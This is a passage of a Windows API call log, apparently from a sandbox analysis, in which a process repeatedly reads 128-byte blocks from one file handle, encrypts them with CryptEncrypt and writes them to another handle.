lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.083] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.083] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.083] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.084] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.084] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.084] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.084] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.084] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.084] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.084] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.084] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.084] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.084] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.084] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.084] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.084] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.084] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.084] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.085] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.085] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.085] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.085] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.085] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.085] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.085] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.085] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.085] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.085] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.085] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.085] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.085] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.086] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.086] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.086] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.086] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.086] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.086] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.086] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.086] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.086] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.086] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.086] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.087] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.087] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.087] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.087] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.087] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.087] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.087] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.087] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.087] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.087] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.087] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.087] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.087] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.088] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.088] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.088] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.088] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.088] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.088] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.088] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.088] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.088] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.088] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.088] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.088] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.088] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.088] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.089] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.089] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.089] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.089] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.089] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.089] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.089] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.089] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.089] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.089] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.089] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.089] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.090] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.090] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.090] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.090] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.090] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.090] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.090] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.090] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.090] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.090] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.090] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.090] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.090] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.090] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.091] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.091] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.091] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.091] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.091] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.091] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.091] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.091] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.091] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0046.091] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0046.091] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, 